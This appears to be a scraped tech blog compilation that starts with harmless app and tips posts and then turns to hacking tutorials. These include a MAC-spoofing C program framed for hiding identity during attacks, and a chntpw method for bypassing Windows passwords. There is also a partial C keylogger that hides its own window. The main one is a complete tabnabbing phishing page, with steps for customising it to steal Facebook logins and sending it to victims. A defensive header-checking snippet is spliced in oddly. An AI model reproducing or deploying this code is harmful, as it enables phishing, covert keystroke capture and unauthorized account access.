Facebook Launches Hello App
Let’s see the features in detail:
With Facebook Hello, you can easily search the places around you. And if the place, hotel or public place already has a Facebook page, you can directly call them with the number provided on their Facebook page. All this happens within a fraction of a second. You just can’t ask for a better service from the social networking giant. Besides that, you can also search for people as you do in the Facebook app.
How to track my smartphone using google search engine command 'Find My Phone' To Locate It
Now, Finding your phone is as simple as searching something on Google...
Instead of searching your phone everywhere, just ask Google where your phone is, and the search engine giant will answer you the exact place where you left your smartphone.
Sounds interesting!
Google unveiled a new feature on Wednesday that lets you search for your Android smartphone or tablet using the search engine on your desktop computer.
How does it work?
- Log in, on your desktop computer’s browser, to the same Google account that you use on your Android smartphone, but before that make sure you have the latest version of the Google app installed on your smartphone.
- Now type "Find my phone" into Google's search engine, and that’s it.
As soon as you press the Enter button, Google will display a map showing your phone's location, accurate to a certain distance. For example, the map showed me that the location of my smartphone was accurate to 35 feet.
However, what if your phone is not visible to you?
Google also offers you a Ring button on the map in order to pinpoint your phone.
You just need to click on the Ring icon and the search engine giant will ring your smartphone at full volume for up to five minutes. Moreover, once you have it in hand, simply press the power button to turn off the ringing.
Not Google alone…
...a similar feature known as Android Device Manager can also help you locate and ring your Android devices. Also in case your Android device has been stolen, this feature helps you to factory reset your device remotely and reset the password if the device is recovered or erase its data.
Apple also offers a similar tracking feature, known as Find My iPhone, that helps iOS users to track down their missing iPhone or iPad, remotely locate its exact location by ringing, lock it and erase its data.
How to speed up your internet with Google new protocol QUIC
Google is trying every effort to make the World Wide Web faster for Internet users.
The company has announced plans to propose its homemade networking protocol, called Quick UDP Internet Connections (QUIC), to the Internet Engineering Task Force (IETF) in order to make it the next-generation Internet standard.
Probably the term QUIC is new for you, but if you use Google’s Chrome browser then there are chances that you have used this network protocol already.
What is QUIC?
QUIC is a low-latency transport protocol for the modern Internet over UDP, an Internet protocol that is often used for streaming media, gaming and VoIP services.
The search engine giant first unveiled the experimental protocol QUIC and added it to Chrome Canary update in June 2013.
The protocol already included a variety of new features, but the key feature is that QUIC runs a stream multiplexing protocol on top of UDP instead of TCP.
The Idea behind QUIC:
QUIC was developed to speed up latency-sensitive web applications, such as search, by reducing the number of network round trips (RTTs) that it takes to establish a connection to a server.
"The standard way to do secure web browsing involves communicating over TCP + TLS, which requires 2 to 3 round trips with a server to establish a secure connection before the browser can request the actual web page," Google's Chrome team wrote in a blog post.
"QUIC is designed so that if a client has talked to a given server before, it can start sending data without any round trips, which makes web pages load faster."
Here are some QUIC highlights:
- Packet pacing to reduce packet loss
- A pluggable congestion control mechanism
- UDP transport to avoid TCP head-of-line blocking
- High security similar to Transport Layer Security (TLS)
- Packet error correction to reduce retransmission latency
- A connection identifier to reduce reconnections for mobile clients
- Fast (0-RTT) connectivity similar to TLS Snapstart combined with TCP Fast Open.
Here’s the Big Deal:
With the help of QUIC, Google aims to combine the best features of both UDP (User Datagram Protocol) and TCP (Transmission Control Protocol) with modern security tools with the goal of Zero-RTT connectivity overhead and better SPDY support.
SPDY is a networking protocol introduced by Google in 2009 and is now being built into the upcoming HTTP/2 (Hypertext Transfer Protocol version 2) protocol.
SPDY is also supported by some technologies including Google's own Chrome browser, Mozilla's Firefox, Microsoft's Internet Explorer 11, many websites such as Facebook, and some of the software that delivers Web pages to browsers.
"Today, roughly half of all requests from Chrome to Google servers are served over QUIC and we’re continuing to ramp up QUIC traffic, eventually making it the default transport from Google clients — both Chrome and mobile apps — to Google servers," Chrome team explained.
The search engine giant does not know how much faster QUIC would make Web surfing over the Internet, but ultimately its goal is to bring improvements to the web we are using today.
Want to Increase or Extend Battery Life of your Laptop
Every laptop user has a great headache about battery backup time. Only new laptops have a good battery backup, and with continued use even these may end up with less backup time. So now I am going to tell you some ways about "How to Increase the Battery Life of Laptop".
Step 1) Click on start and search for "cmd" in the search box.
Step 2) The result will be shown and it will display a "cmd" icon.
Step 3) Right-click on it and choose "Run as administrator".
Step 4) You will see a command line. Now run the command:
- "powercfg -energy" for Windows 7 users and
- "powercfg /energy" for Windows 8 users
Note: Use the command without quotes.
Step 5) Now press Enter.
- Once you execute the command, it will completely scan your system and show some ways to improve your battery life and backup time.
- The result will be saved as an HTML file, which on most PCs is located in the "System32" folder.
Step 6) To access this file, follow the path shown in the command output. Read the report and understand which program is consuming more power and killing the backup of your battery. Try to fix that problem. It will result in a good battery backup and increase battery life.
Meaning of pentesting and how pentesting word derived
Pen-testing or the Penetration testing is a very key term in the ethical hacking scenario. It is a security testing approach often incorporated by most professionals. Penetration is going one step at a time and then mapping out the vulnerabilities in a network. For an ethical hacker, it is very important to know where the vulnerabilities lie in a given network or a protocol. To determine these vulnerabilities and make them into the potential threats for the network, a sequential and step by step approach is adapted. Checking each and every step in a network in an orderly manner is termed as pen-testing. Since the hacker is essentially going deep into the network at each step, it is given the name of penetration. There is no certainty about any loophole or vulnerability and hence every action of the hacker is just a test. This gives the name to this process as Penetration Testing. Penetration testing is often described by the professionals as an "adversarial use by experienced attackers." Other terms have been used to elucidate the same concept: tiger team testing, ethical hacking, and so on. The word "experienced" in this definition is very important: this is because the result of any pen-testing is directly proportional to the skill of the hacker who performs the tests.
Background for Ethical Hackers
Pen-testing is a very good way of testing any software. Companies hire third party pen-testers (this is where the role of ethical hackers comes into the picture) to ensure that their product or software is absolutely free from any loopholes. The pen-testers try to get into the security and perform every test that a potential attacker might try on the software. To put it in other terms, they try to think from the perspective of an outside unethical hacker. A regular pen-test is often advisable in order to ensure a high efficiency of web based applications which have regular updates. Pen-testing requires a special type of person, someone who really enjoys circumventing, subverting, and/or usurping technology built by others.
Author and renowned security tester Joel Scambray describes pen-testing as a very crucial step in any security conduct. "It is even more challenging to sustain an internal pen-test team over the long haul, due to this "cognitive dissonance" as well as the perpetual mismatch between the market price for good pen-testing skills and the perceived value by management across successive budget cycles. Thus, we recommend critically evaluating the abilities of internal staff to perform pen-testing and strongly considering an external service provider for such work", he quotes in his famous release Hacking Exposed.
Conducting Penetration Tests
Whenever a penetration test is to be performed, a proper plan has to be made beforehand. Throughout the process, one must stick to the plan. The basic prerequisite of any pen-testing process is to document everything. There should be written documentation of the node from which the attack will start and the sequence that will be followed. There should be audio, video and screenshots for every key test performed. Ensure that the tests follow a sequence.
Sequences are defined by what your goals are for the penetration tests. Following the sequence becomes of utmost importance not just for adherence to the plan but also for ensuring that you have the right thing being done at every instance of the test conducted.
It is not a good idea to hack into a network midway, enumerate or spread malware from that point, and only then come back to the footprinting. This will make your work very unpredictable for your own employers. Such an unplanned pen-test is a sign of an amateur at work.
Subsequent tests should be based on previous results.
Third Party Pen-testing
To ensure that there is no partiality by the organization's internal pen-testers, a third party pen-tester is hired to perform the job. A few points must always be kept in mind while hiring the third party pen-testers to ensure smooth functioning and optimum return on investment. These crucial factors are:
• Liaison : This refers to providing adequate information to the pen-testers about the networks and the software. This will help the pen-tester to get his documentation and footprinting done on the network to be checked or attacked.
• Schedule : Ideally, pen-testing occurs after the availability of beta-quality code but early enough to permit significant changes before ship date should the pentest team identify serious issues. Yes, this is a fine line to walk.
• Deliverables : Make sure that the pen-testers give a brief documented report on the attacks performed and the measures taken. This will help the future pen-testers to get relevant information while making their documentations.
Types of Penetration Tests
There are basically three types of penetration tests which are as follows:
• Black Box Penetration test
• White Box Penetration test
• Grey Box Penetration test
Black Box Penetration test
To put it in simple terms, black box penetration tests are the tests wherein you cannot see inside the box, hence the name black box. This means that the pen-tester has no idea of what is going on in the network. There is no pre-knowledge of the network or the software with the pen-tester. This usually happens with the unethical attackers as they do not have much clue about the network, how it is laid and where it is connected etc.
Only the publicly available information is available with the penetration tester. Everything else is something that the pen-tester has to work on to find the answers. It is the most realistic simulation of an outside attacker as discussed earlier. It is the most time consuming and expensive pen-testing type as a lot of work has to be done to build a nefarious network around the domain to be attacked.
White Box Penetration test
This is the exact opposite of the black box penetration test. While the black box pen-testers are the unethical attackers, the white box pen-testers are the ethical hackers or the insiders of an organization who are hired to perform the pen-tests to find out any loophole in the network. These pen-testers are basically hired. A proper documentation and data is provided to the penetration tester at the beginning of the test by the network owners. It is the best simulation of an inside attack (usually for productive purposes).
It is useful for testing the specific security conducts in the network. It is a less expensive method as a jump start approach. Most of the data is already provided to the pen-tester and all that he needs to do is try to break into the security of the network. All information like the database servers, the database domains, the networks associated with it, the logs and how all of this is connected; everything is given to the white box penetration tester. They are also told about the potential honey parts of the network or in simple terms, the weak links.
Grey Box Penetration test
It is the most common type of penetration testing. As the name suggests, it is nothing but the hybrid of the black box penetration test and the white box penetration test.
Here in this case, some of the information is given to the pen-tester. All the information is not leaked out as there always is some confidential data which one does not wish to give out. This is because there cannot be a total trust relationship with the hired third party pen-tester. A very good example of this is that during pen-testing, the company gives the pen-tester all the data about the IP addresses and the data servers but does not reveal any logs or transactions of the company.
During the onset of the test, some of the information is given out as and when needed or asked by the pen-tester. This information exchange is scheduled during the tests when the tests fail or stall at any particular instance.
There is a proper balance of disclosure and discovery in this form of pen-testing. Grey box pen-testers are often in the consultative role.
Finally, no matter which security testing approach you choose, it is strongly recommended that all testing focus on the risks prioritized during threat modeling. This will lend coherence and consistency to your overall testing efforts that will result in regular progress toward reducing serious security vulnerabilities.
How to Install Viber for Linux
Viber, one of the best free communication applications, is now available for Linux. Viber for Linux lets you send free messages and make free calls to other Viber users on any device and network, in any country! Viber syncs your contacts and messages with your mobile device.
Viber, as of now, is only available for the 64-bit linux operating systems in the form of debian and rpm packages. Viber can be downloaded from the official source here.
Installation of viber:
Once downloaded the 64-bit debian package of viber, it can be simply installed with dpkg:
coolcoder@PGGT925:~$ sudo dpkg -i viber.deb
[sudo] password for coolcoder:
Selecting previously unselected package viber.
(Reading database ... 249437 files and directories currently installed.)
Unpacking viber (from viber.deb) ...
Setting up viber (3.1.2.3) ...
Processing triggers for desktop-file-utils ...
Processing triggers for bamfdaemon ...
Rebuilding /usr/share/applications/bamf.index...
Processing triggers for gnome-menus ...
To activate viber on Linux machine, there is a pre-requirement that you must have viber installed and activated on your mobile phone. So, first install and activate the viber on your mobile device which can be an android, ios or a windows based.
Once installed, viber needs to be activated inorder to start functioning on the Linux box as you do for the android device.
Let me quickly walk you through the installation of viber on android based mobile device.
Now, once we have setup and activated viber on android mobile device, its time to activate viber on our linux system.
When you start the viber for the first time on your linux box, it asks if you have viber working on your mobile device and once you confirm the same with your mobile number, it sends an activation code via sms required to activate the viber on linux.
Enter the code to activate viber on linux and there you are with viber all setup and working on your linux machine.
As mentioned earlier, there is no official viber 32-bit package for linux but this can be done using applications like wine & crossover. We will take a 32-bit windows installer for viber and install it on ubuntu 12.04 32-bit.
#sudo apt-get install wine
#wget http://download.cdn.viber.com/cdn/desktop/windows/ViberSetup.exe
#wine ViberSetup.exe
How to install Telegram App on Ubuntu
Telegram is a cloud-based mobile and desktop messaging app with a focus on security and speed. Developed and maintained by an India based company, telegram is available for multiple platforms like android, ios, windows, mac, linux etc. Telegram users can exchange encrypted and self-destructing messages, photos, videos and documents and all the file types are supported. This app is more or less similar to whatsapp but the better part is, it is available for almost all the platforms unlike whatsapp.
Download Telegram Messenger:
The latest version available for the telegram application is v0.7.6, which can be downloaded for all of the above platforms from the official source. The best thing about telegram is that it is accessible via web browser as well, with this url.
Installation of Telegram Messenger on Ubuntu:
Unlike viber, which I had demonstrated earlier, telegram is available for the Linux operating system in both 32-bit & 64-bit architectures. For the linux desktop, tar versions are available to download, which allow launching the telegram app directly without any need to install.
Once downloaded, untar the application tar file and you will have the launcher for the telegram desktop application. Double click and launch the application.
Configuration of Telegram:
How to spoof the mac address programmatically
Mac Address or Physical Address:
The MAC address uniquely identifies the network card within the current network segment. It consists of a vendor id that is unique among all network vendors, and a relative id that is unique to the vendor. The address is hard-coded onto the network adapter. But since most of the drivers were developed with the Windows Driver Development kit, the MAC address is read from the Windows registry, when the card is initialized. Now when you are launching any hacking attempt your MAC address is registered at your ISP that your physical address has accessed the particular website and you can be easily identified as MAC address is always unique.
The overall concept is this: the Windows operating system adds an extra layer of device conventions with the help of the registry, and whenever some tool or website inquires about your physical address, Windows picks it from the registry. So in reality your device’s physical address or MAC address will remain the same and unique, but the device’s physical address or MAC address at the Windows user level will be spoofed or changed.
The below technique of changing Mac address is converted into an Automated C program by me(haktuts).
Now let us see how to write a C program to Spoof Mac address or Change window’s level Machine address i.e. Physical address or Mac address.
#include <windows.h>
#include <iostream>
#include <conio.h>
using namespace std;

void readregistry();
char* spoofmac();

int main(int argc, char* argv[])
{
    readregistry();
    spoofmac();
}

char* spoofmac()
{
    char buffer[60];
    unsigned long size = sizeof(buffer);
    HKEY software;
    LPCTSTR location;
    char adapternum[10] = "";
    char numbers[11] = "0123456789";
    // Registry path of the network adapter class, relative to HKEY_LOCAL_MACHINE
    char editlocation[] = "System\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002bE10318}\\0000";
    char macaddress[60];
……….CONTINUED
How to bypass the windows 10 password
Steps to Hack or reset the Windows administrator password:
- Insert Ubuntu Live CD and boot from it.
- Open terminal and install chntpw in Ubuntu. To do so use the following commands.
sudo apt-get update
sudo apt-get install chntpw
- Now mount your Windows volume. In my case it was /dev/sda1. Replace it with yours.
sudo mkdir /media/WINDOWS
sudo mount /dev/sda1 /media/WINDOWS
- Now navigate to the Windows configuration folder.
cd /media/WINDOWS/WINDOWS/system32/config/
- To reset the administrator password enter
sudo chntpw SAM
- After completing this command you will see 5 different choices. Select the 1st one and press Enter and it's done.
- Now restart your system, it will not ask any password.
How to build own keylogger for free
How to code keylogger in C programming language : C codechamp has brought you a detailed tutorial on how to write a Keylogger code in C programming.
C program of Keylogger or keystroke logger : Keylogger is a computer program which captures all the key strokes pressed by user in real time. It captures all the keys and write them to some file say log.txt and stores it on computer hard disk. Now sending these logs to emails or FTP address depends upon the type of keylogger that is keylogger is remote keylogger or physical keylogger. Physical keyloggers are useful when you have physical access to that system and can retrieve logs personally. While remote keyloggers can be used from anywhere in the world, the only requirement is that victim must have internet connection. Today we will be writing a C program of Physical keylogger or Keystroke logger which requires physical access of the system. We will be extending our logic in further programs to make it remote keylogger which sends logs to FTP’s and Emails directly. So first of all lets see how simple keylogger program works…
Algorithm for writing a Simple Keylogger :
1. Create an Empty log file for storing keylogs.
2. Intercept keys pressed by user using GetAsyncKeyState() function.
3. Store these intercepted values in file.
4. Hide the Running Window Dialog to make it undetectable.
5. Use while loop to make it running in all conditions.
6. Add Sleep() function to reduce the CPU usage to 0%.
Now let us see the C program of keylogger or keystroke logger which intercepts all the keys pressed by the user and store these pressed keys in log file.
C program of Keylogger or keystroke logger :
#include<iostream>
#include<windows.h>
#include<fstream>
#include<time.h>
using namespace std;
int main()
{
bool runlogger = true;
ofstream log;
//where your logs will be stored
log.open("C:\\log.txt", ofstream::out);
//displaying error message when unable to open file
if(log.fail())
{
printf("Error in opening log.txt file\n");
}
//Code for hiding running dialog
HWND hideIt = FindWindow("ConsoleWindowClass",NULL);
ShowWindow(hideIt,0);
//Logic for capturing keystokes ........
...................
How to hack the Facebook account via the tabnabbing method
Hey friends, today I am going to explain how to hack emails, social networking websites and other websites involving login information. The technique that I am going to teach you today is advanced tabnabbing. I have already explained what basic tabnabbing is; today we will extend our knowledge base, and I will explain things with a practical example. So let's learn.
I will explain this tutorial using an attack scenario and a live example, and show how to protect yourself from such attacks.
Let us consider an attack scenario:
1. A hacker, say me (haktuts), customizes the current webpage by editing or adding some new parameters and variables (check the code below for details).
2. I (haktuts) send a copy of this web page to the victim whose account, or whatever else, I want to hack.
3. Now when the user opens that link, a webpage similar to this one opens, containing the real page in an iframe with the help of JavaScript.
4. The user will be able to browse the website like the original one, go forward and backward, and navigate through pages.
5. Now if the victim leaves the new webpage open for a certain period of time, the tab or website will change to the phish page, or simply fake page, which looks exactly like the original one.
6. Now when the user enters his/her credentials (username/password), he is entering them in the fake page and is trapped in the net that I have laid down to hack him.
Here ends the attack scenario for advanced tabnabbing.
Note: This tutorial is only for educational purposes. I do not take any responsibility for any misuse; you will be solely responsible for any misuse that you do. Hacking email accounts is a criminal activity punishable under cyber crime law, and you may get up to 10 years of imprisonment if caught doing so.
Before the coding part, let's first share tips to protect yourself from this kind of attack, because it is completely undetectable and you will never be able to know that your account has been hacked or compromised. So first learn how to protect ourselves from advanced tabnabbing.
Follow the measures below to protect yourself from tabnabbing:
1. Always use a script-blocking plugin in your web browser that stops the execution of malicious JavaScript, for example NoScript for Firefox.
2. If you notice anything suspicious happening, first of all verify the URL in the address bar.
3. If you receive a link in an email or chat message, never click on it directly. Always prefer to type it manually in the address bar to open it. This may cost you some manual work or time, but it will protect you from hidden malicious URLs.
4. The best way is to use a good web security toolbar, like AVG web toolbar or Norton web security toolbar, to protect yourself from such attacks.
5. If you use ideveloper or Firebug, verify the headers yourself if you find something suspicious.
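The attack scenario above only works when the real site can be loaded inside another site's iframe, and measure 5 suggests checking headers yourself. As an added example (not part of the original post), the JavaScript below classifies a response's anti-framing headers, X-Frame-Options and the CSP frame-ancestors directive, which are what a site owner sets to refuse being framed. The function names, verdict strings and sample header sets are assumptions constructed for illustration.

```javascript
// Added example: classify how far a response's headers restrict framing.
// Verdicts: "blocked", "same-origin", "allowlist", or "open" (any site may frame it).

function parseFrameAncestors(csp) {
  // Return the frame-ancestors source list, or null when the directive is absent.
  for (const directive of (csp || "").split(";")) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === "frame-ancestors") return sources;
  }
  return null;
}

function auditFraming(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  // Only the enforcing CSP header counts; the Report-Only variant blocks nothing.
  const ancestors = parseFrameAncestors(h["content-security-policy"]);
  if (ancestors !== null) {
    // An enforced frame-ancestors directive makes browsers ignore X-Frame-Options.
    const list = ancestors.map((s) => s.toLowerCase());
    if (list.length === 0 || (list.length === 1 && list[0] === "'none'")) return "blocked";
    if (list.some((s) => /^(\*|https?:|https?:\/\/\*)$/.test(s))) return "open";
    if (list.every((s) => s === "'self'")) return "same-origin";
    return "allowlist";
  }

  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return "blocked";
  if (xfo === "SAMEORIGIN") return "same-origin";
  // Missing, malformed or obsolete ALLOW-FROM values give no protection in current browsers.
  return "open";
}

// Constructed header sets for illustration, not captured from any real site.
const SAMPLES = [
  { name: "no protection", headers: {} },
  { name: "legacy XFO", headers: { "X-Frame-Options": "SAMEORIGIN" } },
  { name: "obsolete ALLOW-FROM", headers: { "X-Frame-Options": "ALLOW-FROM https://partner.example" } },
  { name: "CSP none", headers: { "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'" } },
  { name: "CSP overrides XFO", headers: { "X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors *" } },
  { name: "report-only", headers: { "Content-Security-Policy-Report-Only": "frame-ancestors 'none'" } },
];

function report(samples) {
  return samples.map((s) => `${s.name}: ${auditFraming(s.headers)}`);
}

console.log(report(SAMPLES).join("\n"));
```

A login page that returns "open" can be embedded by any other origin; "blocked" or "same-origin" means the browser refuses to render it inside a foreign frame.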
That ends our security part. Here ends my ethical hacker duty to notify all users about the attack. Now let's start the real stuff.
Note: Aza Raskin was the first person to propose the technique of tabnabbing, and we still follow the same concept. I will just extend his concept to the next level.
First sample code for doing tabnabbing with the help of iframes:
<!–
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: De$trUcTiVe M!ND
Website: http://www.haktuts.com
Version:1.6
–><html>
<head><title></title></head>
<style type=”text/css”>
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body><script type=”text/javascript”>
//———-Set Script Options————–
var REAL_PAGE_URL = “http://www.google.com/”; //This is the “Real” page that is shown when the user first views this page
var REAL_PAGE_TITLE = “Google”; //This sets the title of the “Real Page”
var FAKE_PAGE_URL = “http://www.haktuts.com”; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = “haktuts| Next Generation Hackers Portal”; //This sets the title of the fake page
var REAL_FAVICON = “http://www.google.com/favicon.ico”; //This sets the favicon. It will not switch or clear the “Real” favicon in IE.
var FAKE_FAVICON = “http://www.haktuts.com/favicon.ico”; //Set’s the fake favicon.
var TIME_TO_SWITCH_IE = “4000”; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = “10000”; //Wait this long before switching .
//—————End Options—————–
var TIMER = null;
var SWITCHED = “false”;//Find Browser Type
var BROWSER_TYPE = “”;
if(/MSIE (d.d+);/.test(navigator.userAgent)){
BROWSER_TYPE = “Internet Explorer”;
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;//Set FAVICON
if(REAL_FAVICON){
var link = document.createElement(‘link’);
link.type = ‘image/x-icon';
link.rel = ‘shortcut icon';
link.href = REAL_FAVICON;
document.getElementsByTagName(‘head’)[0].appendChild(link);
}//Create our iframe (tabnab)
var el_tabnab = document.createElement(“iframe”);
el_tabnab.id=”tabnab”;
el_tabnab.name=”tabnab”;
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute(‘src’, REAL_PAGE_URL);//Focus on the iframe (just in case the user doesn’t click on it)
el_tabnab.focus();//Wait to nab the tab!
if(BROWSER_TYPE==”Internet Explorer”){ //To unblur the tab changes in Internet Web browser
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}function TabNabIt(){
if(SWITCHED == “false”){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;//Change the favicon — This doesn’t seem to work in IE
if(BROWSER_TYPE != “Internet Explorer”){
var links = document.getElementsByTagName(“head”)[0].getElementsByTagName(“link”);
for (var i=0; i<links.length; i++) {
var looplink = links[i];
if (looplink.type==”image/x-icon” && looplink.rel==”shortcut icon”) {
document.getElementsByTagName(“head”)[0].removeChild(looplink);
}
}
var link = document.createElement(“link”);
link.type = “image/x-icon”;
link.rel = “shortcut icon”;
link.href = FAKE_FAVICON;
document.getElementsByTagName(“head”)[0].appendChild(link);
}
}
}
</script></body>
</html>
Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook – Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook – Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original ‘real’ page or some other Page.
Now, as I have explained earlier, you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is just edit the above-mentioned 9 fields, save it as anyname.htm, upload it to any free web hosting website along with the favicon file, and send the link to the user in the form of an email or chat message (hidden using the href keyword in HTML or spoofed using some other technique).